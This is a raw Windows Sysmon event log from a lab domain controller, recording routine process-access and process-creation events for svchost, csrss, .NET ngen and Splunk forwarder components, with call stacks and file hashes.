10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.720{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.940{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.766{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:45.563{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\848-0\System.Activities.dll2021-01-18 13:46:45.563 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.547{59A5CD1D-9145-6005-4202-00000000A301}42524916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 